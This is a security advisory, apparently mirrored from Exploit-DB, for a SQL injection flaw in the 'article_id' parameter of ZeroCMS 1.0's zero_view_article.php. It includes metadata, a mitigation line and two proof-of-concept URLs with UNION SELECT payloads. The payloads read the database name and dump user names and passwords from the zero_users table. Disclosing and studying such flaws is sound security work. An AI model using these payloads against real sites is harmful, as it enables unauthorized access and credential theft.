ZeroCMS 1.0 (article_id) SQL Injection Vulnerability

vendor:

ZeroCMS

by:

Gjoko 'LiquidWorm' Krstic

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: ZeroCMS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:another_awesome_stuff:zerocms:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apache/2.4.7 (Win32), PHP/5.5.6, MySQL 5.6.14

2014

ZeroCMS 1.0 (article_id) SQL Injection Vulnerability

Input passed via the 'article_id' GET parameter to zero_view_article.php script is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:


ZeroCMS 1.0 (article_id) SQL Injection Vulnerability


Vendor: Another Awesome Stuff
Product web page: http://www.aas9.in/zerocms/
Affected version: 1.0

Summary: ZeroCMS is a very simple Content Management
System built using PHP and MySQL.

Desc: Input passed via the 'article_id' GET parameter
to zero_view_article.php script is not properly sanitised
before being used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code.

Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5186
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5186.php


09.06.2014

--


http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+concat(unhex(hex(cast(database()+as+char)))),2,3,4,5,6--
http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+(select+concat(unhex(hex(cast(zero_users.name+as+char))),0x20,0x7c,0x20,unhex(hex(cast(zero_users.password+as+char))))+from+`zcdb`.zero_users+limit 0,1),2,3,4,5,6--